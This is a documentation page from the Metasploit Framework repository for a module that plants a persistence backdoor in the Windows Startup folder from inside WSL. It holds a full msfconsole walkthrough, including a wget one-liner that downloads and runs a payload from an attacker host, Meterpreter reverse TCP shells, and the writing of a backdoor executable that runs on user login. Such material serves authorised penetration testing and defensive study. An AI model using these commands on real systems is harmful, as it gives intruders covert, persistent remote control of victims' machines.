Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md
36049 views

Vulnerable Application

This module establishes persistence by creating a payload in the windows startup folder from within the Windows Subsystem for Linux (WSL) environment. This allows for code execution on Windows user login.

Verified on Windows 10 with Ubuntu 24.04 WSL distribution.

Verification Steps

  1. Get a shell on WSL (wsl could be started in a user or admin context)

  2. use exploit/linux/persistence/wsl/startup_folder

  3. set SESSION <id>

  4. exploit

Options

PAYLOAD_NAME

Name of backdoor executable. Defaults to a random name

CONTEXT

Target each User or All Users (system). Defaults to USER. Choices are USER, SYSTEM.

USER

Only required when CONTEXT is set to USER. The user to exploit, or ALL for all of them. Defaults to ALL.

Scenarios

Tested on Windows 10 with Ubuntu 22.04 WSL

Initial access into WSL

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4446 
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown
msf exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : win10prolicensed.localdomain
OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: windows
meterpreter > background
[*] Backgrounding session 1...

Install persistence

msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > set session 1
session => 1
msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(linux/persistence/wsl/startup_folder) > [!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux. This module works with: Windows.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Inside WSL environment
[+] The target appears to be vulnerable. Likely exploitable
[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc

Logout and back in to windows

[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died

msf exploit(linux/persistence/wsl/startup_folder) > 
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500

msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background